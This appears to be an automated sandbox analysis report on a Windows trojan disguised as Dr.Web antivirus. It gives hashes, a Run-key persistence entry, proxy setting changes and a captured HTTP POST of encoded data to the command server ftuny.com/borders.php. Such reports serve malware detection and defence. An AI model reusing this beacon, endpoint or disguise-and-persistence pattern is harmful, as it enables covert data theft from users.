Analysis Date: 2014-08-22 11:00:30
MD5: 671351d8f639eb6db162865a82c348b5
SHA1: 81affee09f80a80eb52a66d4b43cf046b565ef5c

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: f140fca0ff43cbe8cb67385f055e2a11 sha1: fed89bcac8c375d3cd668eebe230d0e3c30c8cb5 size: 9728
Section .rdata md5: e978418ff0e99dc88a25ebdecfd8a0dd sha1: a3eefbddd3900d05ae540a4770f1bef1ca1e5341 size: 5120
Section .data md5: aefe22c7f483d78e71a8b9132bce4d46 sha1: 21f157f73f6a294c9f0e9958271b7e9577ebbdf1 size: 118784
Section .rsrc md5: 9887738dd712e8d57529ed4ad83f5bfe sha1: 3ea10ce9985deb1b8cada71adfadd028aba8740d size: 2048
Timestamp: 2009-09-21 01:36:00
Version:
LegalCopyright: Copyright (C) p DoctorWeb, Ltd., 1992-2011
InternalName: Dr.Web for Windows c2
FileVersion: 5.0.572.1152
CompanyName: ComponentOne LLC
LegalTrademarks:
Comments:
ProductName: Dr.Web for Windows
ProductVersion: 5.0.572.1152
FileDescription: QDrWeb For Windows 2011
OriginalFilename: zPE-Protectedi.exe
PEhash: e45ce3c903bbbfa839592e6536abfe677377a6fb
IMPhash: 684a4b2eb4bf5695c3782650dba7322f

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\CE8SIIFGSU ➝
C:\malware.exe
Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\\\x03\1601 ➝
NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Registry: HKEY_CURRENT_USER\Software\CE8SIIFGSU\OteH ➝
xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P\\x00
Creates File: C:\WINDOWS\Tasks\{22116563-108C-42c0-A7CE-60161B75E508}.job
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: Global\{F5CC5A0A-B9E5-411f-BF7E-EACE3BBC2BF1}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}
Winsock DNS: ftuny.com

Process
↳ C:\malware.exe

Creates Mutex: {A14B1A1D-023F-40dc-BBFE-208B1DAD2F82}

Network Details:

DNS: dailymotion.com
Type: A
195.8.215.137
DNS: dailymotion.com
Type: A
195.8.215.138
DNS: dailymotion.com
Type: A
195.8.215.139
DNS: dailymotion.com
Type: A
195.8.215.136
DNS: netflix.com
Type: A
69.53.236.17
DNS: ftuny.com
Type: A
208.73.211.193
DNS: ftuny.com
Type: A
208.73.211.242
DNS: ftuny.com
Type: A
208.73.211.163
DNS: ftuny.com
Type: A
208.73.211.174
DNS: ftuny.com
Type: A
208.73.211.175
DNS: phreeway.com
Type: A
HTTP POST: http://ftuny.com/borders.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Flows TCP: 192.168.1.1:1031 ➝ 208.73.211.193:80

Raw Pcap
0x00000000 (00000)   504f5354 202f626f 72646572 732e7068   POST /borders.ph
0x00000010 (00016)   70204854 54502f31 2e310d0a 41636365   p HTTP/1.1..Acce
0x00000020 (00032)   70743a20 2a2f2a0d 0a436f6e 74656e74   pt: */*..Content
0x00000030 (00048)   2d547970 653a2061 70706c69 63617469   -Type: applicati
0x00000040 (00064)   6f6e2f78 2d777777 2d666f72 6d2d7572   on/x-www-form-ur
0x00000050 (00080)   6c656e63 6f646564 0d0a5573 65722d41   lencoded..User-A
0x00000060 (00096)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x00000070 (00112)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x00000080 (00128)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x00000090 (00144)   204e5420 352e3029 0d0a486f 73743a20    NT 5.0)..Host: 
0x000000a0 (00160)   6674756e 792e636f 6d0d0a43 6f6e7465   ftuny.com..Conte
0x000000b0 (00176)   6e742d4c 656e6774 683a2033 34310d0a   nt-Length: 341..
0x000000c0 (00192)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x000000d0 (00208)   2d416c69 76650d0a 43616368 652d436f   -Alive..Cache-Co
0x000000e0 (00224)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x000000f0 (00240)   0a0d0a64 6174613d 2f436a45 665a4453   ...data=/CjEfZDS
0x00000100 (00256)   76787143 694b306c 74554d31 7579322f   vxqCiK0ltUM1uy2/
0x00000110 (00272)   79753455 3559704e 6d31762f 2f6a546e   yu4U5YpNm1v//jTn
0x00000120 (00288)   6756632b 774d732b 2b5a426a 375a5359   gVc+wMs++ZBj7ZSY
0x00000130 (00304)   54723369 426b472f 672b3756 43432f30   Tr3iBkG/g+7VCC/0
0x00000140 (00320)   7045726a 4f487037 65526348 5069596f   pErjOHp7eRcHPiYo
0x00000150 (00336)   39394d4d 55756a67 55573462 76544964   99MMUujgUW4bvTId
0x00000160 (00352)   4e2f6a50 58754750 6a61427a 786c6363   N/jPXuGPjaBzxlcc
0x00000170 (00368)   356d704e 30316136 742f5169 53585877   5mpN01a6t/QiSXXw
0x00000180 (00384)   707a3948 6d306b7a 39664266 61556e31   pz9Hm0kz9fBfaUn1
0x00000190 (00400)   30782f47 4c636f66 52694834 4c764673   0x/GLcofRiH4LvFs
0x000001a0 (00416)   41694759 46736169 6f4d5730 374b3045   AiGYFsaioMW07K0E
0x000001b0 (00432)   33726b6b 334d655a 55796744 654c4777   3rkk3MeZUygDeLGw
0x000001c0 (00448)   32733132 2b6f504d 4e726e4a 5a637a68   2s12+oPMNrnJZczh
0x000001d0 (00464)   7a5a3878 694e5775 3554674f 6871344f   zZ8xiNWu5TgOhq4O
0x000001e0 (00480)   71555330 424d5464 4b32625a 792f6878   qUS0BMTdK2bZy/hx
0x000001f0 (00496)   33546e6d 47795446 4c48684c 6352662b   3TnmGyTFLHhLcRf+
0x00000200 (00512)   76417a49 4f424e6d 76343343 444b3251   vAzIOBNmv43CDK2Q
0x00000210 (00528)   30354156 636d4138 324b6854 66557373   05AVcmA82KhTfUss
0x00000220 (00544)   2f476f6c 77786c6d 396b4c73 76325649   /Golwxlm9kLsv2VI
0x00000230 (00560)   36706f36 6e333664 2f33346b 6f6c5677   6po6n36d/34kolVw
0x00000240 (00576)   614b5168 2f513d3d                     aKQh/Q==


Strings
X.N.
.
....
..
.
..
/
.
041904E3
4YVo
5.0.572.1152
5nOp
ANSI
ASCII
BCD overflow
Big Endian Unicode
btUI
Comments
CompanyName
ComponentOne LLC
Copyright (C) p DoctorWeb, Ltd., 1992-2011
Dr.Web for Windows 
Dr.Web for Windows c2
eeje
FDqM
FileDescription
FileVersion
FMHr
GmyrL
InternalName
Invalid owner=This control requires version 4.70 or greater of COMCTL32.DLL
Invalid SQL date/time values
LegalCopyright
LegalTrademarks
LError loading dock zone from the stream. Expecting version %d, but found %d.#No OnGetItem event handler assigned
OriginalFilename
ProductName
ProductVersion
QDrWeb For Windows  2011
Remote Login
%s is not a valid BCD value$Could not parse SQL TimeStamp string
StringFileInfo
Translation
Unicode
UTF-7
UTF-8
VarFileInfo
VS_VERSION_INFO
zPE-Protectedi.exe
0}1Ywt
;0du6N]uh
1[<-<&5
192ZBr3O
196McO3yLmRWy@24
\1Oj;y^
2eYJqU
=	2}LPg=W
3bhC7u
3S"{w3
.3V]{D
-49]CY
4GMyT*
4K|VF 
^4sXGX
5^, 2b
=5B&n7?
5<"CdM
:5H37W
5wWUg4oE
7&9U<h
7ytsRc
)[7z95Lh
8kNeiwE
~8WR!^
8Z_MUU
9=#15;}
, 9jC1c
9YomvRj
aa2VEpc.MZ
ActivateKeyboardLayout
AdjustWindowRectEx
AHCpqY
aL!Rkn
}	aMdI
_AOAvw8bRowxc@20
AOLb,0
|#aowg
a]Sa]a 
aV]=Pd
Avz2p8Q
aw18I1V
[-BOCd/
C2<^+`A
CallNextHookEx
CallWindowProcA
CC07Jm
cDz{%`
cgjZzN
CharLowerA
CharLowerBuffA
CharNextA
CharUpperA
CharUpperBuffA
,c(Hf.
ChildWindowFromPoint
c	JF5t
C]KUE(s
ClientToScreen
CreateFontIndirectA
CreateIcon
CreateMenu
CreatePenIndirect
CreatePopupMenu
CWrL"|]
D4W#a3
d-55a:
$D}=A |
@.data
DefMDIChildProcA
DefWindowProcA
DeleteMenu
DestroyIcon
DestroyMenu
DestroyWindow
Dez3P?
DIDX37
DispatchMessageW
@dmReM|
D	oylQ
DrawAnimatedRects
DrawFrameControl
DrawMenuBar
DrawTextA
DXEK`A
-d@Y74=` =
\e2Xkl
E6SCI0
E#!a8S
EB3cCno
ec7&<T>
edz}u3
egM]	n'
EnableMenuItem
EnableScrollBar
EndPaint
EnumThreadWindows
EnumWindows
e?*<;Q
ET55]PS*
eWIM,k
ExitProcess
f7i1oR
FcAd0@Ps
$Fe)7Q
*f+iv)
FrameRect
fSl1WAj
Fsx99m7
#\'G71
gdi32.dll
GetBitmapBits
GetBkColor
GetBkMode
GetCapture
GetClassInfoA
GetClassLongA
GetClientRect
GetCursor
GetCursorPos
GetDCEx
GetDesktopWindow
GetDlgItem
GetFocus
GetKeyboardLayoutNameA
GetKeyboardType
GetKeyNameTextA
GetKeyState
GetLastActivePopup
GetMenu
GetMenuStringA
GetOEMCP
GetParent
GetProcAddress
GetScrollInfo
GetScrollRange
GetSubMenu
GetSysColorBrush
GetSystemMetrics
GetTextColor
GetWindow
GetWindowLongA
GetWindowLongW
GetWindowTextA
GetWindowThreadProcessId
g%\o5U
GP3UcLXH9
@gxY%w
G:Z[$I
H+F;h3
hgXsdZY
HKSEI 
!hM>,,
Hs?7zZ
"i\|63e%
if9=f_
iHaWKZ4h
Ij[]W>
InflateRect
InsertMenuA
InsertMenuItemA
IntersectRect
IsCharLowerA
IsChild
IsDialogMessageA
IsDialogMessageW
IsDlgButtonChecked
IsIconic
IsRectEmpty
Ist1F.
IsWindow
IsWindowEnabled
IsWindowUnicode
IsZoomed
J4U 17h
@J9ah~=
Ja#EaM
J,eO-sqXE
je\Yj{
_	j?i	~<
J{$L@N
j#p<]e
,J%r_^y
js$5Zm
#jyhpEB}+`Dh
;K+3M,
k;*DsG
)kEdyk.
KERNEL32.DLL
%K!!FC
kn13bTO
K(|vF 
k !	=y
l9KmTQ
LDf2s}{
LoadBitmapA
LoadCursorA
LoadLibraryA
LzhdifaK
LzU+_2-<
m03(ux
M3D`gqqn
M4.iByWeTo
MessageBeep
MessageBoxA
MoveWindow
mZZQkH
NbdnMJ
\.N!|N
?npgKx
nq5FwX
NV2K?2;
nXX 3_?%}
(NzePA 
OffsetRect
OpenClipboard
o]p&>MK
OqVMIFzNl
o&| Yh
PeekMessageA
Ph)G`R
P KVViA
PostMessageA
p]sUD$
PtInRect
$~PvjmX
QbIC=T}
q]DH2/
_Qer1NThrG2A1L@4
_QlffIq3DVbZ
@Qm6to
`.rdata
rDOfau
RDPx6x
RedrawWindow
RegisterClassA
RegisterClipboardFormatA
ReleaseCapture
ReleaseDC
RemovePropA
rO4OvS
R%	ryH-
ScrollWindow
sc*z][
SendMessageA
SendMessageW
SetClassLongA
SetClipboardData
SetCursor
SetForegroundWindow
SetPropA
SetRect
SetScrollInfo
SetScrollPos
SetScrollRange
SetWindowPlacement
SetWindowPos
SetWindowsHookExA
ShowOwnedPopups
ShowWindow
	;{<sJ
s$jhEa
s\mY}"
spc5 c
sr7M}D
sxMl%y
t0Y{},h2
t2PM{;T}
T9PFr5+	
T[BC5v
th%+^f
!This program cannot be run in DOS mode.
TrackPopupMenu
TranslateMDISysAccel
TranslateMessage
ts(}O3E
TtPnAu!su
Tvts1hIb
;tvW;r
twain_32
U,3<WY
U5`j,$Y
uau02S
_}}u F
U&Kj<f_P
UNIQSTR OG98
UnregisterClassA
UpdateWindow
user32.dll
UT>Gcq
vBEIP&D$X
&(Vf2E 
VirtualAlloc
VU;VLr
W^=EvT
WFzf44e8
WindowFromPoint
\W k&J
wsprintfA
'w?tAlp
~W&WVVvU|
WYXXL1C
?*X9}A{
xEEcke
?XJ3`Q
XKiOLx
xo6mCHo
[X}!rh[E
X@?;W3
y20H*R
Y9X(QI
Y/&j5aTW
^{.*YN)(P
z57dWcBpm@24
_ZBh45ah0_v
zMguIs
zPE-Protectedi.exe
Zu<5A`